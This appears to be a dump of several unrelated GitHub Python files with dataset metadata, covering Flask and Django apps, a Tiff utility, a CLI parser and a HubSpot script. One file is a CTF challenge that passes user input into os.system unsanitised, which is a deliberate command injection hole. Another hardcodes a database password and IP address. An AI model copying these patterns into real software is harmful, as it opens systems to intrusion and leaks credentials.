@app.route('/query', methods=['GET'])
def query():
query = "SELECT * from sessions"
record = db.db_query(query)
return Response(json.dumps(str(record), indent=2), mimetype="text/plain")
try:
app.run(host="0.0.0.0")
except KeyboardInterrupt:
importer.db_close()
print ("Quit")
| johnnydev543/aurora-dreamband | run.py | run.py | py | 1,659 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "aurora.aurora.SESSION_IMPORTER",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "aurora.aurora",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "flask.reques... |
74236535463 | from flask import Flask, request, jsonify
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
# Replace 'your-connection-string' with your actual connection string
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://john1:Lucban2101@35.239.116.222/john1'
db = SQLAlchemy(app)
class Item(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255), nullable=False)
description = db.Column(db.String(255))
@app.route('/items', methods=['GET'])
def get_items():
items = Item.query.all()
result = []
for item in items:
result.append({
'id': item.id,
'name': item.name,
'description': item.description
})
return jsonify(result)
@app.route('/items', methods=['POST'])
def create_item():
data = request.get_json()
new_item = Item(name=data['name'], description=data.get('description'))
db.session.add(new_item)
db.session.commit()
return jsonify({'message': 'Item created successfully'})
@app.route('/items/<int:item_id>', methods=['PUT'])
def update_item(item_id):
item = Item.query.get(item_id)
if item is None:
return jsonify({'message': 'Item not found'}), 404
data = request.get_json()
item.name = data['name']
item.description = data.get('description')
db.session.commit()
return jsonify({'message': 'Item updated successfully'})
@app.route('/items/<int:item_id>', methods=['DELETE'])
def delete_item(item_id):
item = Item.query.get(item_id)
if item is None:
return jsonify({'message': 'Item not found'}), 404
db.session.delete(item)
db.session.commit()
return jsonify({'message': 'Item deleted successfully'})
if __name__ == '__main__':
app.run(debug=True) | JohnLRanola/lab5 | main.py | main.py | py | 1,775 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask_sqlalchemy.SQLAlchemy",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "flask.request.get... |
23951701787 |
import os
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail
from twilio.rest import Client
from sendsms import api
from django.conf import settings
from .models import Host, Clients
from .forms import HostLogin, HostSignUp, ClientRegistration, Checkout
from django.utils import timezone
from django.contrib import messages
from django.core.mail import send_mail
from django.contrib.auth.models import User
from django.template.loader import render_to_string
from django.shortcuts import render, redirect, reverse
from django.contrib.auth.decorators import login_required
from django.contrib.auth import login, authenticate, logout
# Function based view for home page
def home(request):
return render(request, 'home.html', {})
# Function based view for Host Registration
def hostSignup(request):
if request.method == "POST":
form = HostSignUp(request.POST)
if form.is_valid():
username = form.cleaned_data.get('username')
email = form.cleaned_data.get('email')
password = form.cleaned_data.get('password1')
phone = form.cleaned_data.get('phone')
address = form.cleaned_data.get('address')
user = User.objects.create_user(
username=username, email=email, password=password)
extendedUser = Host(user=user, email=email,
phone=phone, address=address)
extendedUser.save()
print('Registration done')
if user is not None:
messages.success(request, 'Registration success')
return redirect(reverse('hostSignup'))
else:
form = HostSignUp(None)
context = {
"form": form
}
return render(request, 'auth/hostSignup.html', context)
# Function based view for Host Login
def hostLogin(request):
if request.user.is_authenticated:
return redirect(reverse('home'))
if request.method == "POST":
form = HostLogin(request.POST)
if form.is_valid():
username = form.cleaned_data.get('username')
password = form.cleaned_data.get('password')
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
print('Logged In')
return redirect(reverse('god:client'))
else:
messages.error(request, 'Invalid username and password')
return redirect(reverse('hostLogin'))
else:
messages.error(request, 'Please fill the form correctly')
return redirect(reverse('hostLogin'))
else:
form = HostLogin(None)
context = {
"form": form
}
return render(request, "auth/hostLogin.html", context)
@login_required(login_url='hostLogin')
def hostCloseMeeting(request):
logout(request)
return redirect(reverse('home'))
# Function based view for Guest Registration
@login_required(login_url='hostLogin')
def clientRegister(request):
if request.method == "POST":
form = ClientRegistration(request.POST)
print(request.POST)
if form.is_valid():
name = form.cleaned_data.get('name')
phone = form.cleaned_data.get('phone')
email = form.cleaned_data.get('email')
altUser = Clients.objects.filter(email=email, phone=phone)
print(altUser)
if altUser.exists():
user = Clients.objects.get(name=altUser[0])
user.inMeeting = True
user.checkInTime = timezone.now()
user.checkOutTime = timezone.now()
user.save()
else:
user = Clients(name=name, phone=phone, email=email)
user.inMeeting=True
user.checkInTime = timezone.now()
user.checkOutTime = timezone.now()
user.save()
print(name, phone, email, user)
print(user.checkInTime, Clients.objects.get(name=user.name).inMeeting)
if user is not None:
# # Sending Email to Host
m = "Hey {host}, {guest} just checked-in for the meeting. {guest}'s email is {email} and phone number is {phoneNum}".format(
host=request.user.username,
guest=user.name,
email=user.email,
phoneNum=user.phone
)
message = Mail(
from_email=os.environ.get('DEFAULT_FROM_EMAIL'),
to_emails=request.user.email,
subject='Check-In from new Guest',
html_content=m)
sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))
response = sg.send(message)
print(response.status_code, response.body, response.headers)
print('Email send')
# SMS send to host
smsContext = {
"host": request.user.username,
"guestName": user.name,
"guestEmail": user.email,
"guestPhone": phone
}
client = Client(settings.ACCOUNT_SID, settings.AUTH_TOKEN)
smsBody = render_to_string("snippets/sms.html", smsContext)
smsPhone = "+{}{}".format(request.user.profile.phone.country_code,
request.user.profile.phone.national_number)
print(smsBody, smsPhone)
try:
smsMessage = client.messages \
.create(
body=smsBody,
from_=os.environ.get('TWILIO_PHONE_NUMBER'),
to=smsPhone
)
print(smsMessage.sid)
print('SMS send')
except:
print('SMS send failed')
messages.success(request, 'Thanks for Checking-In. Enjoy the meeting.')
print(user, user.checkInTime, user.checkOutTime)
return redirect(reverse('god:client'))
else:
form = ClientRegistration(None)
context = {
"form": form
}
return render(request, 'auth/clientRegistration.html', context)
@login_required
def ClientCheckout(request):
if request.method == "POST":
form = Checkout(request.POST)
if form.is_valid():
name = form.cleaned_data.get('name')
email = form.cleaned_data.get('email')
phone = form.cleaned_data.get('phone')
user = Clients.objects.get(email=email, phone=phone)
if user is not None:
messages.success(request, 'Thanks for attending the meeting')
user.checkOutTime = timezone.now()
user.inMeeting = False
user.save()
context = {
"guestName": user.name,
"guestEmail": user.email,
"guestPhone": phone,
"address": request.user.profile.address,
"guestCheckInTime": user.checkInTime,
"guestCheckOutTime": user.checkOutTime
}
# Sending Email to Guest
message = Mail(
from_email=os.environ.get('DEFAULT_FROM_EMAIL'),
to_emails=email,
subject='Thanks for attending meeting',
html_content=render_to_string('snippets/email.html', context))
sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))
response = sg.send(message)
print(response.status_code, response.body, response.headers)
return redirect(reverse('god:client'))
else:
messages.error(request, 'Please enter details correctly')
return redirect(reverse('god:ClientCheckout'))
else:
form = Checkout(None)
context = {
"form": form
}
return render(request, "auth/ClientCheckout.html", context)
| nightwarriorftw/Zeus | zeus/god/views.py | views.py | py | 8,226 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "forms.HostSignUp",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.models.User.objects.create_user",
"line_number": 38,
"usage_type": "call"
... |
6798072131 | import logging
import json
from django.core.management.base import BaseCommand
from ...models import Category, Tag
logger = logging.getLogger('library')
INDUSTRIES_CATEGORY = 'Industries'
EXO_ATTRIBUTES_CATEGORY = 'ExO Attributes'
TECH_CATEGORY = 'Technologies'
INDUSTRIES_LIST = [
'Accommodations', 'Accounting', 'Advertising', 'Aerospace',
'Agriculture & Agribusiness', 'Air Transportation', 'Aircraft',
'Alcohol', 'Apparel & Accessories', 'Auto', 'Aviation', 'Banking',
'Beauty & Cosmetics', 'Big Data', 'Biotechnology', 'Biotechnology',
'Chemical', 'Communications', 'Computer', 'Construction',
'Consulting', 'Consumer Products', 'Cosmetic', 'Cybersecurity',
'Diamond',
'Economy', 'Education', 'Electronics', 'Employment', 'Energy', 'Ethics',
'Entertainment & Recreation',
'Fashion', 'Financial Services', 'Food & Beverage', 'Future',
'Glass', 'Health',
'Hospitality',
'Information',
'Insurance', 'Inspiration', 'Internet of Things', 'Investment and Trading',
'Journalism & News',
'Legal Services', 'Life Sciences', 'Manufacturing',
'Media & Broadcasting', 'Medical', 'Metal', 'Military',
'Motion Pictures & Video', 'Music', 'Nanotechnology',
'Neuroscience', 'Nuclear', 'Packaging', 'Paint & Coatings',
'Oil and Gas',
'Petrochemicals', 'Pharmaceutical', 'Plastics', 'Privacy', 'Private Spaceflight',
'Publishing', 'Pulp & Paper', 'Rail', 'Real Estate', 'Recycling',
'Retail', 'Robotics', 'Security', 'Service', 'Shipping', 'Shipyards',
'Society', 'Solar', 'Space', 'Space-based Economy', 'Specialty Drugs',
'Sporting Goods', 'Sports', 'Steel', 'Sustainability',
'Telecommunications', 'Television', 'Textile', 'Tire', 'Tobacco', 'Toy', 'Transport',
'Utilities',
'Video Game',
'Waste', 'Web Services',
]
EXO_ATTRIBUTES_LIST = [
"Staff on Demand", "Community & Crowd", "Algorithms",
"Leveraged Assets", "Engagement", "Interfaces", "Dashboards",
"Experimentation", "Autonomy", "Social Technologies", 'MTP'
]
DEFAULT_FILTERS = [
'Consulting', 'Education', 'Computer', 'Communications',
'Blockchain', 'Internet of Things', 'Artificial general intelligence',
'Cryptocurrency', 'Virtual Reality'
]
class Command(BaseCommand):
def handle(self, *args, **kwargs):
TECHNOLOGIES = []
with open('resource/management/commands/technologies.json') as json_data:
techs = json.load(json_data)
for tech in techs:
TECHNOLOGIES.append(tech.get("title"))
CATEGORIES = [{
'name': EXO_ATTRIBUTES_CATEGORY,
'values': EXO_ATTRIBUTES_LIST
}, {
'name': INDUSTRIES_CATEGORY,
'values': INDUSTRIES_LIST
}, {
'name': TECH_CATEGORY,
'values': TECHNOLOGIES
}]
for category in CATEGORIES:
category_name = category.get("name")
cat, _ = Category.objects.get_or_create(name=category_name)
Tag.objects.get_or_create(name=category.get("name"))
default_show_filter = False
for tag in category.get("values"):
default_show_filter = False
if category_name == EXO_ATTRIBUTES_CATEGORY or tag in DEFAULT_FILTERS:
default_show_filter = True
defaults = {
'category': cat,
'default_show_filter': default_show_filter
}
Tag.objects.update_or_create(name=tag, defaults=defaults)
| tomasgarzon/exo-services | service-exo-medialibrary/resource/management/commands/import_tags_and_categories.py | import_tags_and_categories.py | py | 3,548 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 60,
"usage_type": "name"
},
{
"api_name": "json.load",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "mo... |
5667997586 | from setuptools import setup
PACKAGES = [
'ladder_network',
'ladder_network.ops',
]
def setup_package():
setup(
name="LadderNetwork",
version='0.1.0',
description="TensorFlow implementation of Rasmus et. al's Ladder Network",
author='Joshua D. Loyal',
url='https://github.com/joshloyal/LadderNetwork',
license='MIT',
install_requires=['numpy', 'tensorflow'],
packages=PACKAGES,
)
if __name__ == '__main__':
setup_package()
| joshloyal/LadderNetwork | setup.py | setup.py | py | 512 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 10,
"usage_type": "call"
}
] |
43195907824 | from tifffile import TiffFile
import collections
from xml.etree import cElementTree as etree
import traceback
#Class for error handling
class PythImageError(Exception):
def __init__(self, message, errors):
super(PythImageError, self).__init__(message)
self.traceback=str(traceback.format_exc()).replace('\n', '\n\t\t')
self.message = message
self.errors = errors
def __str__(self):
return repr(self.message)#+"\n\nERROR:"+repr(self.errors)+"\n\nTRACEBACK:"+str(self.traceback)
class lazyattr(object):
"""Attribute whose value is computed on first access. As in tifffile.py from Christoph Gohlke"""
def __init__(self, func):
self.func = func
def __get__(self, instance, owner):
# with self.lock:
if instance is None:
return self
try:
value = self.func(instance)
except AttributeError as e:
raise RuntimeError(e)
if value is NotImplemented:
return getattr(super(owner, instance), self.func.__name__)
setattr(instance, self.func.__name__, value)
return value
def get_image_source(path):
'''
Return the image type. Currently only imageJ and ome Tiff files are supported.
'''
with TiffFile(path) as tif:
if tif.is_imagej:
output='imagej'
if tif.is_imagej:
output='ome'
return output
def length(a):
'''
Append elements of two lists using slice notation. Elements of list b are added to the end of a.
'''
if not isinstance(a, collections.Iterable) or isinstance(a, str):
length=1
else:
length=len(a)
return length
def dict_to_string(d, string='', lvl=0):
for k, v in d.items():
string+='%s%s' % (lvl * '\t', str(k))
if type(v) == dict:
string+=':%s'%str(v)+'\n'
#If deeper recursion is needed
#utils.dict_to_string(v, string, lvl+1)
else:
string+=':%s'%v+'\n'
return string
def xml2dict( xml, sanitize=True, prefix=None):
"""Return XML as dict. Adapted from the tiffile package authored b Christoph .
>>> xml2dict('<?xml version="1.0" ?><root attr="name"><key>1</key></root>')
{'root': {'key': 1, 'attr': 'name'}}
"""
#Decode to avert parsing errors as some software dump large text
#fields into the file that occasionally contain erronious chars
xml=xml.decode('utf-8', errors='ignore')
return etree2dict(etree.fromstring(xml), sanitize, prefix)
def asbool(value, true=(b'true', u'true'), false=(b'false', u'false')):
"""Return string as bool if possible, else raise TypeError.
>>> asbool(b' False ')
False
"""
value = value.strip().lower()
if value in true: # might raise UnicodeWarning/BytesWarning
return True
if value in false:
return False
raise TypeError()
def astype(value):
# return value as int, float, bool, or str
for t in (int, float, asbool):
try:
return t(value)
except Exception:
pass
return value
def etree2dict(t, sanitize=True, prefix=None):
'''Convert eTree object to dict.
Adapted from https://stackoverflow.com/a/10077069/453463
'''
at = tx = ''
if prefix:
at, tx = prefix
key = t.tag
if sanitize:
key = key.rsplit('}', 1)[-1]
d = {key: {} if t.attrib else None}
children = list(t)
if children:
dd = collections.defaultdict(list)
for dc in map(etree2dict, children):
for k, v in dc.items():
dd[k].append(astype(v))
d = {key: {k: astype(v[0]) if len(v) == 1 else astype(v)
for k, v in dd.items()}}
if t.attrib:
d[key].update((at + k, astype(v)) for k, v in t.attrib.items())
if t.text:
text = t.text.strip()
if children or t.attrib:
if text:
d[key][tx + 'value'] = astype(text)
else:
d[key] = astype(text)
return d
def represents_type(s, atype):
'''
Check if string represents type given through atype!
'''
try:
atype(s)
return True
except ValueError:
return False
def concatenate(a,b):
'''
Append elements of two lists using slice notation. Elements of list b are added to the end of a.
'''
if not isinstance(a, collections.Iterable) or isinstance(a, (str,dict)):
a=[a]
if not isinstance(b, collections.Iterable) or isinstance(b, (str,dict)):
b=[b]
a[len(a):len(a)]=b
return a
def list_of(lst, object_type):
return any((isinstance(x, object_type) for x in lst))
def value_to_key(dictionary, val):
#Get the ocurrences of val among dictionary values
count=sum(value == val for value in dictionary.values())
#version 2: count=sum(map((val).__eq__, dictionary.values()))
#If value is not in dictionary.values raise exception
if count==0:
raise LookupError('Value %s is not in dictionary'.format(str(val)))
if count>1:
raise LookupError('More than one key have value %s!'.format(str(val)))
#get value
#version 2: list(dictionary.keys())[list(dictionary.values()).index(val)]
for key, value in dictionary.items():
if value == val:
return key
def rename_duplicates(string_list):
'''Processes a list of strings. If list has duplicate elements an index is added to it.
'''
if isinstance(string_list, str) or not isinstance(string_list, list):
raise Exception('Object must be list of strings!')
output = []
for idx, val in enumerate(string_list):
totalcount = string_list.count(val)
count = string_list[:idx].count(val)
output.append(val +'_'+ str(count + 1) if totalcount > 1 else val)
return output
def get_version(package_name):
'''Return package version number.
'''
from pip._vendor import pkg_resources
return str(pkg_resources.get_distribution(package_name).version) | KatonaLab/Build3D | src/app/modules/packages/a3dc/external/PythImage/utils.py | utils.py | py | 6,381 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "traceback.format_exc",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "tifffile.TiffFile",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "collections.Iterable",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_name": "xml.... |
40122929996 | """Module for the cli argument parser."""
import sys
from typing import List
from configargparse import ArgumentParser, HelpFormatter
from .globals import (
CONFIG_PATHS,
ALLOWED_SHOW_VALUES,
EXT_LOG_DEFAULT,
EXT_OUT_DEFAULT,
EXT_ERR_DEFAULT,
TOLERATED_USAGE,
BAD_USAGE,
ARGUMENT_ERROR
)
class CustomFormatter(HelpFormatter):
"""
Custom formatter for setting argparse formatter_class.
Identical to the default formatter,
except that very long option strings are split into two
lines.
Solution discussed on: https://bit.ly/32CkCWK
"""
def _format_action_invocation(self, action):
"""Reformats long argument help descriptions."""
if not action.option_strings:
metavar, = self._metavar_formatter(action, action.dest)(1)
return metavar
parts = []
# if the Optional doesn't take a value, format is:
# -s, --long
if action.nargs == 0:
parts.extend(action.option_strings)
# if the Optional takes a value, format is:
# -s ARGS, --long ARGS
else:
default = action.dest.upper()
args_string = self._format_args(action, default)
for option_string in action.option_strings:
# parts.append('%s %s' % (option_string, args_string))
parts.append(f"{option_string}, {args_string}")
if sum(len(s) for s in parts) < self._width - (len(parts) - 1) * 2:
return ', '.join(parts)
# else
return ',\n '.join(parts)
class CLIArgumentParser(ArgumentParser):
"""
Parser based on configargparse ArgumentParser to be able
to ignore config files.
"""
_ignore_configs = None
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._ignore_configs = False
def set_default_config_paths(self, config_paths):
"""Set default config paths."""
self._default_config_files = config_paths
def ignore_configs(self):
"""Mainly for testing, ignore configs every time"""
self._ignore_configs = True
def get_params(self, args: List = None):
"""Get params from args."""
if args is None:
args = []
# add config paths if help wanted
if "-h" in args or "--help" in args:
self.set_default_config_paths(CONFIG_PATHS)
self.parse_args(["-h"])
# exit
# else check if --ignore-config is set
prio_args = self.parse_args(args)
if not prio_args.ignore_config and not self._ignore_configs:
# if not set add config paths
self.set_default_config_paths(CONFIG_PATHS)
return self.parse_args(args)
def error(self, message: str):
self.print_usage(sys.stderr)
self.exit(ARGUMENT_ERROR, f"{self.prog}: error: {message}\n")
def setup_parser() -> CLIArgumentParser:
"""
Define parser with all arguments listed below.
:return: parser
"""
parser = CLIArgumentParser(
formatter_class=CustomFormatter,
# Todo: Change when fixed:
# https://github.com/bw2/ConfigArgParse/issues/217
allow_abbrev=False,
description="Analyze or summarize HTCondor-Joblogs",
)
parser.add_argument(
"paths",
nargs="*",
help="Directory of file paths for log files"
)
parser.add_argument(
"-r", "--recursive",
action="store_true",
default=False,
help="Recursive search through directory hierarchy"
)
parser.add_argument(
"--version",
help="Get the current version of this script",
action="store_true"
)
parser.add_argument(
"-v", "--verbose",
help="Print out extended execution details",
action="store_true",
default=False
)
parser.add_argument(
"--analyze",
action="store_true",
default=False,
help="Analyze given files one by one"
)
parser.add_argument(
"--ext-log",
help="Suffix of HTCondor job logs (default: none)",
default=EXT_LOG_DEFAULT
)
parser.add_argument(
"--ext-out",
help="Suffix of job out logs (default: .out)",
default=EXT_OUT_DEFAULT
)
parser.add_argument(
"--ext-err",
help="Suffix of job error logs (default: .err)",
default=EXT_ERR_DEFAULT
)
allowed_show_vals = ALLOWED_SHOW_VALUES[:] # copying
allowed_show_vals.append('') # needed so empty list are valid in config
parser.add_argument(
"--show",
nargs="+",
default=[],
dest="show_list",
choices=allowed_show_vals,
help="Show more details"
)
parser.add_argument(
"--rdns-lookup",
action="store_true",
default=False,
help="Resolve the ip-address of an execution nodes"
" to their dns entry"
)
parser.add_argument(
"--tolerated-usage",
type=float,
help="Threshold to warn the user, "
"when a given percentage is exceeded "
"between used and requested resources",
default=TOLERATED_USAGE
)
parser.add_argument(
"--bad-usage",
type=float,
help="Threshold to signal overuse/waste of resources, "
"when a given percentage is exceeded "
"between used and requested resources",
default=BAD_USAGE
)
action = parser.add_mutually_exclusive_group()
action.add_argument(
"-c", "--config",
is_config_file=True,
help="Path to config file"
)
action.add_argument(
"--ignore-config",
action="store_true",
help="Do not search for config"
)
return parser
| psyinfra/HTCAnalyze | htcanalyze/cli_argument_parser.py | cli_argument_parser.py | py | 5,847 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "configargparse.HelpFormatter",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "configargparse.ArgumentParser",
"line_number": 55,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 75,
"usage_type": "name"
},
{
"api_name":... |
6981217998 | import os
import sys
import json
from applnlayer.ApplnMessageTypes import ResponseMessage
def serialization(rm):
json_buf={
"code":rm.code,
"contents":rm.contents
}
return json.dumps(json_buf)
def deserialization (buf):
json_buf = json.loads(buf)
rm=ResponseMessage(0,None)
rm.code=json_buf["code"]
rm.contents=json_buf["contents"]
return rm
| mandali8686/PA3manda | response_serialization.py | response_serialization.py | py | 413 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.dumps",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "applnlayer.ApplnMessageTypes.ResponseMessage",
"line_number": 20,
"usage_type": "call"
}
] |
5795982413 | from selenium import webdriver
import csv
def Skill():
driver = webdriver.Chrome()
driver.maximize_window()
driver.implicitly_wait(120)
url="https://www.jobs.af/"
driver.get(url)
href=[]
skill_description=[]
elm=driver.find_elements_by_xpath('//div[@class="item-header"]//h2//a')
for i in elm:
try:
href.append(i.get_attribute('href'))
except Exception as e:
print(e)
for i in href:
driver.get(i)
try:
t=driver.find_elements_by_xpath('//*[./preceding-sibling::h3="Skills Description:"]//p')
except:
t=''
for i in t:
skill_description.append(i.text)
with open('submission.csv','w') as f:
f.write("Url , Title \n")
with open('submission.csv', 'a') as data_file:
for i in range(0,12):
data_file.write(str(href[i])+ "," + str(skill_description[i]) + "\n")
driver.close()
if __name__ == '__main__':
Skill() | musAhmadi/mustafa.ahmadi | dynamic_scripting/skill_description.py | skill_description.py | py | 1,005 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 4,
"usage_type": "name"
}
] |
31522303288 | import os
import openai
from flask import Flask, redirect, render_template, request, url_for, jsonify
app = Flask(__name__)
openai.api_key = os.getenv("OPENAI_API_KEY")
@app.route("/", methods=("GET", "POST"))
def index():
if request.method == "GET":
query_parameters = request.args
if query_parameters.get("prompt"):
prompt = query_parameters.get("prompt")
response = openai.Completion.create(
model="text-davinci-003",
prompt=prompt,
temperature=0.6,
max_tokens=4000-int(len(prompt)/5),
)
return jsonify(response.choices[0].text)
return jsonify('No prompt provided')
return jsonify('ChatGPT API') | fujiwen/chatgpt-api-flask | app.py | app.py | py | 746 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "openai.api_key",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.getenv",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "flask.request.method",
"li... |
74912810023 | import struct
import socket
from prettytable import PrettyTable
class IPv4(object):
def __init__(self):
self.version = None # 4bit version
self.headerlen = None #4bit header length
self.tos = None # 8bit type of service
self.totalLen = None # 16bit total length
self.identification = None # 16bit header identification
self.fragment = None # 16bit others and fragment offset
self.ttl = None # 8bit time to live
self.protocol = None # 8bit type of protocol
self.checksum = None # 16bit header checksum
self.srcIP = None # 32bit src IP address
self.dstIP = None # 32bit dst IP address
def decodeIP(self,buffer):
(versionAndLen,self.tos,self.totalLen,self.identification,self.fragment,
self.ttl,self.protocol,self.checksum,self.srcIP,self.dstIP) = struct.unpack('>cBHHHBBHII',buffer)
self.version = str(versionAndLen.hex())[0]
self.headerlen = str(versionAndLen.hex())[1]
self.dstIP = socket.inet_ntoa(struct.pack('I',socket.ntohl(self.dstIP)))
self.srcIP = socket.inet_ntoa(struct.pack('I',socket.ntohl(self.srcIP)))
def info(self):
row = PrettyTable()
row.add_row(['version', self.version])
row.add_row(['header length', self.headerlen])
row.add_row(['type of service', self.tos])
row.add_row(['total length', self.totalLen])
row.add_row(['header identification', self.identification])
row.add_row(['others and fragment offset', self.fragment])
row.add_row(['time to live', self.ttl])
row.add_row(['type of protocol', self.protocol])
row.add_row(['header checksum', self.checksum])
row.add_row(['src IP address', self.srcIP])
row.add_row(['dst IP address', self.dstIP])
return row
def data(self):
data = []
data.append(self.version)
data.append(self.headerlen)
data.append(self.tos)
data.append(self.totalLen)
data.append(self.identification)
data.append(self.fragment)
data.append(self.ttl)
data.append(self.protocol)
data.append(self.checksum)
data.append(self.srcIP)
data.append(self.dstIP)
return data
| fishmingyu/tcpStatis | IPv4Decode.py | IPv4Decode.py | py | 2,338 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "struct.unpack",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "socket.inet_ntoa",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "struct.pack",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "socket.ntohl",
"line_n... |
23528325219 | #!/usr/bin/python3
import os
import tempfile
import argparse
def query_db(row):
if not row:
row = 'FirstName'
sql = f".open /home/jared/chinook.db\nSELECT {row} FROM employees;"
os.system(f'echo "{sql}" | /usr/bin/sqlite3')
print("Done!")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--row", help="Row to query")
args = parser.parse_args()
query_db(args.row)
| zeyu2001/My-CTF-Challenges | STANDCON-2021/pwn/space-university-of-interior-design/service/src/query_db.py | query_db.py | py | 448 | python | en | code | 36 | github-code | 36 | [
{
"api_name": "os.system",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 18,
"usage_type": "call"
}
] |
14302631347 | '''Smoothing/Blurring is done when an img has a lot of noise such as camera sensors,lighting issues,etc'''
import cv2 as cv
import numpy as np
img = cv.imread('Resources/Photos/cats.jpg')
cv.imshow('Original', img)
# 1.) Averaging - Each pixel is replaced by the average value of all pixels in the kernel window i.e. for a 3*3 kernel the centre pixel will be replaced by avg of other 8 surrounding pixels
average = cv.blur(img, (3,3)) #will implement averaging blur with a kernel of3*3. Increasing kernel size will increase blur
cv.imshow('Average Blur', average)
# 2.) GaussianBlur - similar to averaging operation but the surrounding pixels given a weight so weighted avg calculated. It gives less blurring than Averaging Blur but is more natural.
gauss = cv.GaussianBlur(img, (3,3), 0) #0 is s.d. in x direction
cv.imshow('Gaussian Blurred', gauss)
# 3.) Median Blur - Instead of averaging it replaces pixel with median of its surrounding.
# It provided more blur than above two methods and is effective to reduce SALT&PEPPER NOISE.
# It is not effective with higher kernel sizes such as 5*5 or 7*7
median = cv.medianBlur(img, 3) # kernel size is just 3 as automaticallly understands 3*3
cv.imshow('Median Blur', median)
# 4.) Bilateral Blurring - most effective blurring
#other blurring methods dont see if they are removing edges or not but Bilateral blurring does blurring but RETAINS edges as well
bilateral = cv.bilateralFilter(img, 10, 20, 20) #10 is diamter of neighborhood, 20 is sigma color (higher value indicates more colors in neighborhood), 20 is sigma space (higher value means pixel farther from centre will influence blurring more)
cv.imshow('Bilateral blurring', bilateral)
cv.waitKey(0) | ajinkeya17/OpenCV-Course | Codebase/smoothing.py | smoothing.py | py | 1,723 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cv2.imread",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "cv2.blur",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 12,
... |
9901411991 | import requests
import json
import urllib
from requests.exceptions import HTTPError
def getContact(email, apikey):
contact = {}
try:
#print("- Downloading Contact from Hubspot API...")
url= 'https://api.hubapi.com/contacts/v1/contact/email/' + email + '/profile?hapikey=' + apikey
response = requests.get(url)
response.raise_for_status()
jsonResponse = response.json()
#print(jsonResponse['properties'])
if 'phone' in jsonResponse['properties']:
contact['phone'] = jsonResponse['properties']['phone']['value']
else:
contact['phone'] = ""
if 'firstname' in jsonResponse['properties']:
contact['name'] = jsonResponse['properties']['firstname']['value']
else:
contact['name'] = ""
if 'lastname' in jsonResponse['properties']:
contact['lastname'] = jsonResponse['properties']['lastname']['value']
else:
contact['lastname'] = ""
except HTTPError as http_err:
if response.status_code == 404:
print("------ ERROR: contact " + email + " might not exist. Maybe it was deleted ------")
else:
print(f"--- HTTP error occurred: {response}")
contact['phone'] = 'error'
contact['name'] = 'error'
contact['lastname'] = 'error'
return contact
except Exception as err:
print(f'------- Other error occurred: {err}')
contact['phone'] = 'error'
contact['name'] = 'error'
contact['lastname'] = 'error'
return contact
def processEvent(e, statusDict):
#print(e)
email = e['recipient']
#print ("Event read for: " + email)
if email in statusDict.keys():
#print("- already in statusDict.keys")
# IF CURRENT EVENT TYPE IS FINAL OR EQUAL TO CURRENT STATE, DO NOTHING. ELSE, SAVE IT IF IT'S A MORE RECENT TYPE IN THE WORKFLOW
if statusDict[email] == 'DROPPED' or statusDict[email] == 'BOUNCE' or statusDict[email] == 'SPAMREPORT' or statusDict[email] == e['type']:
#print("--- already " + e['type'] + ". Nothing to do.")
pass
else:
if e['type'] == 'CLICK':
statusDict[email] = e['type']
elif e['type'] == 'OPEN' and statusDict[email] not in ['CLICK']:
statusDict[email] = e['type']
elif e['type'] == 'DELIVERED' and statusDict[email] not in ['CLICK', 'OPEN']:
statusDict[email] = e['type']
elif e['type'] == 'PROCESSED' and statusDict[email] not in ['CLICK', 'OPEN', 'DELIVERED']:
statusDict[email] = e['type']
